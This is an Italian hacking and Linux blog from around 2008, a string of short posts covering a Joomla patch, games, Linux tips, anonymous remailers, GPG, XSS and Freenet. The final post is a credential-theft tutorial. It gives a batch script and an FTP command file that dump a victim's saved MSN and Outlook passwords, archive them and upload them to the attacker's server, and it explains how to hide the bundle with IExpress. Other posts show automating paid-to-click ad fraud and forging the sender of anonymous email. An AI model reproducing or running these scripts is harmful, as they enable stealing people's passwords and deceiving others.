Cari lettori che utilizzate il famoso CMS Joomla, mettetevi in guardia dall’ultimo pericolosissimo bug.

Gli sviluppatori del noto CMS Joomla hanno fatto sapere che è già in circolazione un pericoloso exploit che sfrutta una vulnerabilità presente nelle versioni del software dalla 1.5.x alla 1.5.5.

Il bug riguarda la funzionalità di password reset, può consentire ad un utente di ottenere l’accesso amministrativo al CMS.

L’exploit è stato reso noto il 12/08/08, il giorno successivo il team Jommla ha pubblicato le patch, quindi si consiglia caldamente di aggiornare il proprio sito alla versione 1.5.6 per evitare che qualsiasi lamer o script kiddies vi distrugga tutto.

Se non volete aggiornare tutto il Core, è possibile patchare solamente il file buggato /components/com_user/models/reset.php con questo codice:


if(strlen($token) != 32) {
$this->setError(JText::_(’INVALID_TOKEN’));
return false;
}


Urban Terror è un FPS o Sparatutto in Prima Persona (tattico), è totalmente freeware, sviluppato sul motore grafico di Quake Arena III.

Due squadre SWAT si affrontano in molti scenari e modalità di gioco diverse, dunque è molto importante il gioco di squadra.

Le modalità di gioco disponibili: Team Survivor, Capture the Flag, Bomb-ModeTeam,  Deathmatch, Free for All, Capture and Hold, Follow the Leader.

Il gioco è molto realistico, vi è il danno localizzato, un singolo colpo alla teste senza elmetto di protezione porta alla morte, quindi un colpo al torace farà senz’altro più danni di uno inferto alle gambe, inoltre vi è la possibilità di uccidere il nemico saltandogli addosso da una certa altezza.

Le ferite se non curate portano alla morte per dissanguamento, vi è anche il fiato (o stamina) che viene consumato correndo, le armi richiedono molto tempo per essere ricaricate, se si spara mentre si è in corsa son molto meno precise e si ha anche l’effetto rinculo, insomma un bel gioco che rispecchia la realtà.

Le armi che le SWAT hanno a disposione sono svariate: pistole, mitragliatrici, fucili, fucili a pompa, granate e fucili mitragliatori e coltelli, tutte tratte dalla realtà.

Altri oggetti presenti in gioco: Elmetto, giubotto antiproiettile, medipack, visore tattico, silenziatore, puntatore laser, munioni extra.

Il gioco è un multiplayer, quindi si gioca esclusivamente online, vi è anche una community italiana, il suo sito web:http://www.urtitalia.net/, mentre il sito ufficiale http://www.urbanterror.net/

Un gioco molto divertente, a cui dedico 1 ora o due ogni tanto, per svagare la mente, ve lo consiglio e non mi resta che augurarvi Good Game!

Per chi come me, utilizza il proprio Desktop Linux anche per giocare, adesso può contare su un interessante utility “Compiz-Switch“.

E’ noto che Compiz-Fusion durante l’avvio di un gioco, porta a degli sfarfallii che non permettono di giocare come si dovrebbe.

Compiz-Switch permette di attivare e disattivare Compiz-Fusion  in maniera molto rapida con un  semplice click.

Da QUI potete scaricare il pacchetto .deb per distribuzioni Debian/Ubuntu o altre derivate.

Una volta installato l’applicazione è subito disponibile:

Applicazioni -> Accessori -> Compiz-Switch

E adesso potete godere dei vostri giochi preferiti al meglio!

Chiunque scrive di Linux o di programmazione informatica in generale, ha desiderato almeno una volta nella vita del suo blog/site, pubblicare un Repository Personale, permettendo così il download, installazione, l’update, del proprio software sviluppato, o altri pacchetti software modificati personalmente.

Per creare un Repository Semplice, che gestisce un solo tipo di architettura, e solamente file binari senza disponibilità di sorgente, ci viene in aiuto il software BUC.

Per creare il proprio repository, tramite una comoda interfaccia grafica, è necessario seguire questi punti:

• Scaricare il pacchetto creare-repomc
• Decomprimere l’archivio da terminale: unzip creare-repomc.zip
• Avviare il software da terminale: buc creare-repo.mc &
• Riempire tutti i campi richiesti, e fare click su Crea Il tuo repository

L’applicativo è stato realizzato da miei conterranei -> SicilLinux

Installando la google toolbar su firefox  si è verificato un errore del sottoprocesso kio-umountwrapper. Non riuscivo a rimuovere e/o installare niente da synaptic.

Facendo una ricerca del bug su lauchpad son uscite diverse discussioni : https://bugs.launchpad.net/ubuntu/+source/kio-umountwrapper/+bug/186729

Non volendo leggere tutto, ho provato a risolvere da me, quindi chiunque si trova nelle mie stesse condizioni può risolvere aprendo il terminale e digitando i comandi:


sudo apt-get clean
sudo apt-get update
sudo apt-get install -f
sudo apt-get install kio-umountwrapper

Ed ecco che tutto torna alla normalità.

A me son sempre piaciuti temi scuri per il mio GNOME Desktop, bene ho trovato davvero quello che fa per me.

Fino a qualche settimana fa, non ero a conoscenza della variante ufficiale  Ubuntu Studio, l’ho provata da Live CD, e mi son innamorato del Tema, quindi ho fatto subito una ricerca sul gestore pacchetti Synaptic della mia Hardy, due colpi di mouse e in poco più di qualche minuto, tutto pronto.

Ho modificato il wallpaper Wirls disponibile su http://www.gnome-look.org, aggiungendo Tux con la maglia della Nazionale, e spostando la scritta Ubuntu in alto a sinistra.

Ecco la foto del Cubo sulla mia Ubuntu Box.

Almeno personalmente ho trovato “network-manager” abbastanza carente in molti aspetti, tra cui l’impossibiità di utilizzare gli IP STATICI, cosa per me fondamentale, dopo l’acquisto del mio ultimo router wireless.

Dunque decido di rimuovere completamente network-manager e sostituirlo con l’efficente Wicd, devo riconoscere che è davvero fatto bene, programmato in python, supporta molti algoritmi di cifratura, si può settare sia il DHCP che un IP statico.

Una semplice installazione del pacchetto binario e via con la configurazione tramite GUI, il file .deb lo potete trovare QUI.

Buona Navigazione!

Ultimamente sto provando varie distribuzioni Linux, specialmente le ultime uscite, devo dire che sulla mia fiammante Fedora 9, mi mancava proprio compiz-fusion, ma con l’aiuto di Google, ho risolto senza compilare niente, ho trovato i repository adatti su questo blog http://unico-lab.blogspot.com/.

L’ultima Versione impacchettata pronta per l’installazione, nessuna compilazione, i binari e via!

Apprendo che: “da alcuni mesi il dipartimento di fisica dell’universita’ dell’Insubria ospita l’unico mirror europeo del repositorio Yum contenente l’ultimissima versione (git version) di Compiz-Fusion per Fedora 8 e da adesso anche per Fedora 9!”

Per installare il repository da terminale digitate:


wget http://www.dfm.uninsubria.it/compiz/fusion/compiz-fusion.repo \
-O /etc/yum.repos.d/compiz-fusion.repo

Invece per installare Compiz-Fusion completo dei pacchetti unsupported, sempre da terminale:

yum install compiz-all fusion-icon-all \
compiz-fusion-plugins-unsupported compiz-bcop \
ccsm emerald-themes

Isylea è un gioco fantasy on-line multiutente che permette, calandosi nei panni di un personaggio, di vivere all’interno di una vasta ambientazione fantasy-medievale in costante evoluzione, soprattuto grazie alle azioni dei giocatori stessi, che svolgono una parte attiva all’interno della storia.

Benché si possa identificare come un discendente dei MUD (Multi User Dungeon), Isylea unisce alla tradizionale interfaccia a comandi testuali una curata interfaccia grafica che permette un’interazione con il gioco più piacevole ed intuitiva. Si offre inoltre spazio a svariate tipologie di interpretazione e ruoli, svincolando il gioco dagli schemi tradizionali di dungeons e combattimenti.

La solida ambientazione unita al clima full-gdr, offrono una varietà di spunti e situazioni di gioco potenzialmente infinita.

Mediante l’utilizzo di meccaniche è possibile produrre qualsiasi cosa (dal costruire case al generare veleni mescolando erbe, a esplorare monti, mari, fiumi ed isole navigandoci con imbarcazioni magari costruite da voi, a ricercare incantesimi, a inventare stili di combattimento, guidare i propri compagni in battaglia, o perfino confrontare la calligrafia di uno scritto che si sta leggendo…).

Sì può generare qualsiasi personaggio, poiché il sistema è ad abilità e non a classi e vederlo interagire con centinaia di altri in un mondo in costante mutamento ed evoluzione.

Vi sono differenti razze: Umani, Dryma, Goblin, Elfi, Nani, Golem e Orchi.

Ciascuna razza possiede un proprio dominio di conoscenze, usi e costumi; ha una storia, una religione, si tramanda miti e leggende.

Per interpretare al meglio il proprio personaggio è necessario leggere accuratamente le informazioni di ambientazione rese disponibili per la propria razza.

Per permettere ad ogni giocatore di avere una visione d’insieme e scegliere la razza a lui più congeniale, sono comunque accessibili informazioni d’ambientazione riguardanti tutte le razze giocabili, sebbene le informazioni disponibili nelle sotto-sezioni di ciascuna razza rappresentano una conoscenza comune solo ai personaggi di quella razza.

Il gioco è fruibile su ogni piattaforma, poichè server e client sono stati sviluppati in Java

Sito Ufficiale -> www.isylea.it

Licenza : Freeware

Guadagnare non facendo niente o quasi

Foto del Pagamento ricevuto in data 18/03

Sono qui per farvi ricredere e illustrarvi un metodo veloce e pratico per guadagnare un 63,00 $ al mese facendo quasi nulla!

Inizio subito col dire che non è uno di quei servizi che hanno la fregatura ed è tutto gratis e legale.

Lo uso da più di un mesetto e mi ci sto mantenendo i miei account premium su megaupload e Rapidshare tenendo semplicemente aperto un browser Firefox minimizzato mentre faccio tutt’altro.

Con questo metodo potrai comprarti un account premium di qualsiasi filehoster o semplicemente potrai guadagnare soldi da spendere, ad esempio, su Ebay.

E non solo se mi aggiugente a MSN, vi spiego anche il metodo per guadagnare 10 $ per ogni inscritto che portate a bux.to

Mail MSN -> morgen[AT]paranoici.org

Un esempio di guadagno potrebbe essere con 10 click ads per giorno = $0.10 con 20 referrals che cliccano 10 ads per giorno = $2.00 guadagno giornaliero = $2.10 guadagno settimanale = $14.70 guadagno mensile = $63.00, questo è solo un esempio le cui entità possono variare in base al numero di referral e dei click.

Segui questi semplici punti per iniziare a guadagnare:

Per prima cosa devi avere Firefox!

1) Salta questo punto se hai già un account AlertPay
altrimenti vai su AlertPay ed iscriviti.
Crea un account Personal Pro (Gratis), validando poi l’account.

2) Adesso Clicca Qui e iscriviti clikkando su Join now and receive a $0.05 Sign-up Bonus, lasciandomi come vostro refer non solo riceverete $0.04 in più, ma riceverete più link giornalieri da clikkare in quanto io sono un utente Premium.

Verrai pagato solamente per cliccare sui link.
Più sponsor visiterai più soldi guadagnerai!

Guadagnerai semplicemente visitando dei siti per 30 secondi a visita. Verrai pagato $0.01 per ogni visita e $0.01 per ogni visita di un tuo referral. Puoi far iscrivere quanta gente vuoi sotto di te e quindi guadagnare di più! I pagamenti vengono effettuati via PayPal solitamente in 24-48 ore. Per ricevere un pagamento devi guadagnare almeno $10.3) Rendilo automatizzato (Lascia Firefox aperto e guadagna!)

3) Installa queste due aggiunte su Firefox ReloadEvery
GreaseMonkey
Chiudi e riapri Firefox per completare l’installazione

4) Adesso, vai su bux e clicca su Surf Ads

Clicca ora con il destro nella pagina > Aggiorna Ogni > Abilita
Clicca nuovamente con il destro > Aggiorna Ogni > Imposta
Inserisci 1 minuto e 30 secondi
(Questo significa che la pagina si aggiornerà ogni minuto e 30 secondi)

5) Adesso, installa questo file
Script Bux.to
(Greasemonkey ti chiederà di installare il file, clicca su “Installa”)

6) Torna su bux e clicca su Surf Ads
Lascia aperta la pagina e fai lavorare gli scripts installati nei punti precedenti che ogni minuto e 30 secondi ricaricheranno la pagina, e se ci saranno nuovi sponsor, verranno automaticamente cliccati facendoti guadagnare!

7) Usa i soldi guadagnati per comprarti un account Premium per MegaUpload.com o per Rapidshare.com o li spendi suy Ebay!

Buon guadagno & Buon Download…

Se hai domande o hai bisogno di aiuto per impostare firefox o qualcos’altro non esitare a contattarmi.
Questa società non perde soldi, anzi ne guadagna molti di più di noi che clicchiamo.

E’ inoltre possibile trasferire i soldi su carta prepagata Postepay, per poi ritirarli dallo sportello Postale

Recensione completa Bux -> QUI!

morgen[AT]paranoici.org -> Aggiungetemi su MSN per qualsiasi problema

Gli Anonymous Remailer o Remailer Anonimi, sono dei server di posta che consentono di scambiare messaggi e-mail senza che si possa scoprire il mittente originale, permettendo così di comunicare liberamente senza ritorsione alcuna, purtroppo ci sono ancora paesi che non consentono la libertà di espressione, un esempio la Cina.

Questi server non tengono log di nessun genere, non memorizzano IP e permettono di cambiare l’header del messaggio con un altro header falso.

Molti remailer prendono carico solo le mail criptate in PGP, quindi per poterli utilizzare bisogna avere la chiave pubblica del remailer, di solito è possibile reperirla scrivendo una mail vuota con oggetto “remailer-key”.

Se vogliamo inviare una mail a tizio@provider.it, usando un remailer, dobbiamo far precedere il tutto da un’intestazione come questa:

****************************************************

::
Anon-To: tizio@provider.it

Il messaggio… bla bla bla…

*****************************************************
Ricordatevi una riga vuota e i due punti all’inizio, la riga Anon-To contiene il destinatario finale del messaggio e-mail, adesso si deve criptare il tutto con la remailer-key.

Il messaggio crittato deve a sua volta avere un intestazione come questa:

***************************************************************

From: linus@tolvalds.com
To: anon@remailer.org
::
Encrypted: PGP

****************************************************************

La prima riga è il falso mittente della mail, la seconda è l’indirizzo del remailer anonimo, ricordatevi i due punti e la digitura Encrypted: PGP.

Il risultato finale dovrebbe essere simile a questo:

****************************************************************

From: linus@tolvalds.com
To: anon@remailer.org
::
Encrypted: PGP

—–BEGIN PGP MESSAGE—–
Version: 3.0.1i

cSHT4zCbQmtlbzGFM9T0jSD7QVvEzaPcUlBSSWHQclbnR9YWJNp5BFSLdR9s
owE1jMsNwjAUBH3gZMk9PClnUoBPUANpwElW2OBPZD8H0gd1UCP2gduuNDNfj
—–END PGP MESSAGE—–
****************************************************************

Non appena il remailer riceverà la vostra mail la decritterà e la invierà a destinazione, oppure è possibile inviare la mail ad un altro remailer, ricordando di crittarla con la sua chiave pubblica, concatenando più remailer si ha una maggiore sicurezza.

Tuttavia i remailer non sono affidabili al 100%, è possibile che un messaggio venga perso, quindi è consigliabile spedirne più copie.

Vi segnalo portale italiano, www.autistici.org, che oltre al remailer anonimo, offre tanti servizi, utilissimi per la privacy:

• Account e-mail anonimi tipo tuonome@autistici.org ecc…( non analizzano la posta ai fini di pubblicità, diversamente da gmail.com)

• Mailing-list anonime

• Spazio Web e Piattaforme Blog

Il tutto gratuitamente, senza fini di lucro, il progetto vive di sole donazioni da parte degli utenti, quindi una donazione conviene sempre farla!

Policy del Network Autistici - Inventati

GnuPG (Gnu Privacy Guard) o anche GPG è un software Open Source, compatibile con il famoso sistema di crittografia PGP, è sviluppato dalla Free Software Foundation.

Compatibile con tutti i sistemi operativi e con molti programmi OpenSource, il livello di robustezza raggiunto è tale, che nemmeno i “potenti” servizi segreti Americani sono riusciti a decrifrarlo.

E’ possibile utilizzarlo per crittare le nostre mail utilizzando il comunissimo client Thunderbird, tramite un plug-in scritto ad hoc, dal nome EnigMail.

Tutto questo è dovuto per il crescente bisogno di comunicare in modo sicuro e semplice, senza che terzi, possano reperire le nostre informazioni confidenziali scambiate.

GnuPG permette di nascondere, dietro a una serie di simboli e caratteri stampabili, delle informazioni o messaggi decodificabili solo dal destinatario finale e dal suo mittente, quindi anche se il messaggio viene intercettato, non sarà possibile carpirne il contenuto.

Ciò è possibile poichè si usa una cifratura a chiave asimmetrica, cioè mittente e destinatario dispongono di una identica chiave di codifica e un’altra per la decodifica.

Ogni utente dispone di una chiave pubblica e di una chiave privata, la prima può essere diffusa senza alcun problema, serve appunto alla codifica del messaggio; la seconda chiave privata, è protetta da una passphrase (un intera frase), questa chiave viene usata per la decodifica e garantisce dunque che sia solamente il destinatario a leggere le informazioni contenute nel messaggio.

La chiave pubblica può essere inviata tramite posta elettronica oppure può essere inviata a dei KeyServer, dei server “magazzino” usati per scambiarsi la chiave pubblica, senza bisogno di inviarla ogni volta.

Tutto ciò può sembrare astruso e complicato da realizzare, ma è tutto svolto autonomamente dai programmi.

Due consigli: quando generate le chiavi, usate una passphrase abbastanza complicata e scegliete una chiave di grosse dimensioni 4096 bit.

Analizziamo un attacco della tipologia “Code Injection“, il Cross Site Scripting o “XSS”.

Con la tecnica XSS, possiamo attaccare sia un portale dinamico che un sito statico, il tutto si basa sull’iniezione di codice che devia il normale comportamento della piattaforma, praticamente bisogna far girare degli Script Malevoli nel sito direttamente dal browser.

Osserviamo un esempio, ecco il codice di una pagina vulnerabile:

<html>
<head>
<title>Sito Vulnerabile Cross Site Scripting “XSS”</title>
<script type=”text/javascript”>
function prova() {
var ins=prompt(”Inserisci un numero…”);
return prova;
</script>
</head>
<body>
<script type=”text/javascript”>
insert=prova();
document.write(”Il numero che hai inserito è “,insert);
</script>
</body>
</html>

Questa pagina html, contiene un piccolo JavaScript, il cui compito è quello di stampare a video, il numero che abbiamo precedentemente inserito, ad un utente smaliziato salta subito all’occhio che il codice non ha controlli, inserendo una parola tra due apici “Ciao bello”, il codice della pagina muterà in

document.write("Il numero che hai inserito è ","Ciao Bello");

così facendo abbiamo mutato il valore della variabile, fin qui niente di pericoloso, e se invece inseriamo del codice Javascript esempio:

<script>alert("Questo sito è Vulnerabile!!!")</script>

Facile, il codice sorgente muterà ancora, il risultato sarà la comparsa di una finestrella Alert con scritto “Questo sito è Vulnerabile!!!” .

Bene, per chi conosce il javascript è un gioco da ragazzi far girare qualsiasi script, pensiamo ad un cookie grabber, ovvero il furto dei cookie.

Una vulnerabilità così semplice, che spesso viene ignorata dagli Admin può portare a gravi conseguenze, si può facilmente arrivare anche al pieno controllo del portale.

La libertà di informazione e la conoscenza della verità sono i valori portanti di ogni Hacker, oggi voglio scrivere di un progetto che incorpora questi ideali.

Il progetto in questione è Freenet 0.7, il software è disponibile per tutti i sistemi operativi: Windows, Linux e Mac.

Freenet è una rete peer-to-peer ideata e svilupata per ragioni di anonimato e sicurezza , priva di server centrali, ossia decentralizzata, proprio per evitare attacchi e censure.

Freenet nasce per il diritto di libertà, che è un principio indiscusso, che oggi non sempre viene rispettato.

Il progetto mira ad impedire a organi governativi o qualsiasi altra organizzazione di scoprire cosa l’utente sta facendo sulla rete, rende inoltre impossibile determinare e tracciare sia i Nodi (utenti) di Freenet che i dati che viaggiano nella rete.

L’utente stesso non sa quali file o informazioni risiedono nel suo nodo, per ovvi motivi.

Freenet sfrutta la banda e lo spazio su disco dei suoi utenti, quindi un peers (nodo) ha la doppia funzione di Client/Server, tutto ciò permette la pubblicazione e la circolazione di qualsiasi tipo di informazione.

Freenet è una “rete dentro la rete”, ove è possibile:

• Pubblicare siti web nel completo anonimato

• Comunicare attraverso forum, instant messaging e chat, e-mail

• Distribuire vari tipi di file

Sito Ufficiale Progetto -> http://freenetproject.org/

Wiki Italiano ->FreenetZeroPuntoSette

Circa tre mesi fa è partito il progetto Evilsentinel, un sistema di sicurezza universale per applicazioni web in php, sviluppato dal programmatore Evilsocket.

Essendo un progetto universale può essere installato su tutti i CMS: Joomla, Php-Nuke, PHP-Fusion, Wordress ecc…

Nella sua release attuale la 1.0.2 Public è in grado di filtrare, bloccare e notificare all’ amministratore del sito molti tipi di attacchi:

• Scanning/crawling di software come Acunetix o simili, utilizzati per velocizzare la rilevazione di falle di sicurezza.

• Cross site scriptings o XSS.

• SQL Injection.

• Remote file inclusions o RFI.

• Local file inclusions o LFI.

• Admin privileges escalations.

E’ stata sviluppata la tecnologia AIT,(adaptive ip tracking) che permette all’admin di seguire le mosse dell’attaccante sul suo sito in tempo reale o di guardarsi i log ordinati per ip, data, ora e pagina con comodità in un secondo momento.

Scarica Evilsentinel 1.0.2 -> QUI!

Sito Ufficiale Progetto -> QUI!

Circa un mese fa un gruppo hacker dal nome OSX89 è riuscito ad hackerare Mac OS X permettendo di farlo girare su un comune PC.

Il Sistema Operativo Crackato è reperibile sui famosissimi motori di ricerca di file torrent.

E’ stato pubblicato una sorta di tutorial di installazione, che in sole tre fasi permette di installare il tutto perfettamente.

Dai test effettuati si denota che Mac su un PC gira meglio che su di un Apple a parità di  hardware.

Tutto questo è grandioso tranne per il fatto che è illegale, Apple consente l’uso di Mac solamente su hardware autoprodotto.

Non volendo infrangere la legge non ho installato Mac, ma ho solamente imitato il dekstop.

L’immagine sottostante è il mio attuale desktop di Windows XP, un ingrandimento QUI!

Esistono dei software che consentono di modificare l’aspetto di Windows XP imitando l’interfaccia grafica di Mac, ma tuttavia appesantiscono il sistema, un esempio è FlyakiteOSX.

Non volendo dare ulteriori problemi a Windows che già ne ha troppi, ho preferito solamente installare la RocketDock, la barra animata in basso che mi ha permesso di eliminare le icone sul desktop incorporandole a essa.

In seguito ho spostato la barra di Windows in alto, non è visibile perchè è impostata su “Nascondi Automatico” e per finire ho messo lo sfondo adatto con quella stupenda X.

Ho anche provato il cubo rotante 3D, il software dal nome DeskSpace è possibile utilizzarlo per 14 giorni in versione Trial.

Molto utile avere otto desktop anche su Win ma destabilizzava tutto il sistema e ho proceduto a rimuoverlo.

Scarica Wallpaper Leopard -> QUI!

Il mio primo post sul phreaking o anche “hacking del telefono“, per i curiosi consiglio di visitare la pagina disponibile su wikipedia qui.

Girovagando per il web, alla ricerca d’informazioni sulla città sicula Gela, mi imbatto in un forum cittadino.

Casualmente leggo di un programmatore che ha sviluppato un software SMS7 che permette di inviare gratuitamente SMS verso Vodafone utilizzando un servizio messo a disposizione dalla stessa compagnia telefonica.

Scarico il software e inizio a provarlo, invio decine di sms alla mia ragazza cliente Vodafone facendola addirittura imbestialire.

Il software si dimostra molto facile ed intuitivo, comprende anche una rubrica, ma per utilizzarla è necessario registrare la copia del programma, prelevando il codice dal forum di supporto previa registrazione gratuita.

Il software è disponibile per tutte le piattaforme Microsoft quali: Windows 98SE, ME, NT4.0, 2000, XP, 2003 e Vista.

Il produttore assicura anche un utlizzo con Linux tramite il software di emulazione Wine.

UPDATE

SMS7 cambia nome in XMS7, è stato implementato l’invio degli MMS, poichè Vodafone ha disattivato gli SMS gratis.

Download XMS7 2.1.0 -> QUI!

Sono stato chiamato anch’io a questo meme da Paso, l’ultimo meme a cui ho partecipato è stato “Servizi 2.0 che uso“.

Non li trovo tanto piacevoli difatti ho commentato il post di no1globe con un “noooooooooooo!” ripetuto.

» Chi o cosa ti ha spinto a creare un blog?
Inizialmente non avevo intenzione di aprire un blog ma avevo bisogno di un posto dove appuntare le cose che facevo e le cose interessanti che trovavo sul web, allora ho incominciato a scrivere i miei appunti su dei fogli di testo; successivamente ho riflettuto sulla possibilità di rendere pubblici i miei appunti e allora la decisione di aprire un blog e l’idea di rielaborare gli appunti in how-to, post-tecnici e divulgativi.

Sono molto contento di averlo fatto dato il successo che ho riscontrato, 136.000 visite in soli 5 mesi dall’apertura del blog.

» Il tuo primo post?
Non ho incominciato con un post sui miei propositi, ma iniziando con un post sul mondo hacker come il “Jargon File“, subito dopo seguendo con due post etici ho voluto dichiarare la mia posizione e gli argomenti che avrei affrontato quali ICT Security & Hacking etico.

» Il post di cui ti vergogni di più?
Non saprei proprio, diciamo che mi vergogno di tutti i post ove faccio errori di grammatica e sintattica per la fretta o per mia ingnoranza.

» Il post di cui sei più fiero?
E’ una scelta difficile perchè sono fiero di tutto il mio blog, potrei scegliere i post con più visite giornaliere:

Come rubare password di MSN e di una casella email da remoto con MessenPass e Mail Pass view;
Guida Trojan: Subseven 2.2 il controllo remoto nascosto alla portata di tutti;
Come trovare password di una casella mail;

secondo il mio modesto parere questi post non sono migliori di altri perchè molto richiesti ma tutt’altro, ritengo una guida alla programmazione molto più utile.

Ecco i link ad alcuni post a mio avviso costruttivi:

Un linguaggio dinamico impariamo il php (Corso di php);
La programmazione visuale: il visual basic (Corso di Visual Basic);
Guida Programmazione: Un linguaggio compilato il C++ (Guida Tutorial).

Per concludere questo meme passo la palla a qualunque blogger legga questo post e ovviamente a tutto il mio blogroll.

Girovagavo tra i feeds e percaso mi son trovato davanti al post “Quanto sei nerd?” di Paso, spinto dalla curiosità ho subito iniziato a rispondere alle domande dei test.

I miei risultati li vedete nelle due immagini sottostanti, vi incito a svolgere i test! Reputo divertente scoprire l’esito e poi decidere se tirarsela o vergognarsi!

Chi si ricorda dei programmini “MessePass” e “MailPassView“, quelli usati in quel famoso metodo per rubare le password via penna USB?

Bene per chi non lo sapesse questi due programmini servono per recuperare le password dimenticate memorizzate su una macchina.

Adesso vi dimostro come è possibile utilizzarli per rubare le password salvate senza avere accesso fisico alla macchina.

Il pirata informatico si serve di: uno spazio web, il programma “MessenPass”, “MailPassView”, il file eseguibile di WinRar, un editor di testo qualsiasi per scrivere il file start.bat e il file ftp.txt.

Il codice del file start.bat:

@echo off
messenpass.exe /sverhtml Password-MSN.html //scrive l’output di messenpass in un file html
mailpassview.exe /sverhtml Password-Outlock.html //scrive l’output di mailpasspreview in un file html
rar.exe a archvio.rar *.html //comprime i due file html contenenti le password in una archivio
md c:\temp //crea la cartella temporanea
copy ftp.txt C:\temp //copia il file ftp.txt nella catella temporanea
copy *.rar c:\temp //copia il file rar nella cartella temporanea
cd c:\temp //si posiziona nella cartella temporanea
ftp -v -i -s:ftp.txt //avvia la sessione ftp con lo spazio web e permette di eseguire i comandi contenuti nel file di testo
del ftp.txt //elimina il file ftp che contiene i dati di accesso e i comandi dalla cartella temporanea
del *.rar //emilina i file rar nella cartella temporanea

Il contenuto del file ftp.txt:

open tuositoftp.org //l'host dello spazio web
tuouserftp //l’username dello spazio web
tuapasswordftp //la password dello spazio web
cd msn //cartella che conterrà i log
lcd c:\temp //si posiziona nella cartella locale temporanea
BINARY //imposta il trasferimento di file di tipo binario
mput *.rar //trasferisce i file rar allo spazio web
bye //chiude la sessione ftp

Il pirata tramite ftp crea una cartella chiamata “msn” dove riceverà il file compresso che contiene le password, successivamente invierà alla sua vittima tutti questi programmi compressi con iexpress.

Iexpress è un software di casa Microsoft, potete usarlo seguendo il procedimento: start->esegui->digitare “iexpress”(senza virgolette)->PREMERE INVIO.

Ovviamente ho scritto il codice con degli errori in modo tale da non poter essere usato con iexpress, questo evita l’uso spropositato ai lamer di turno.

Iexpress permette di autoestrarre dei file in modalità nascosta “hidden” quindi la vittima quando apre il file non si accorge di niente,nessuna finestra, nessun errore, non da segno di vita alcuna, la vittima è convinta che il file non funziona.

Il pirata non invierebbe mai i file senza averli prima compressi e nascosti, perchè il file ftp.txt contiene i dati di login al suo spazio web.

Due consigli:

non memorizzate le password sul vostro computer ma riscrivetele ogni volta;

se siete troppo pigri e non volete rinunciare alla comodità della password salvata vi consiglio di non aprire file eseguibili ricevuti via email o via Messenger che non siano di fonte certa, poichè potrebbero contenere questi file maligni!

E’ tutto alla prossima!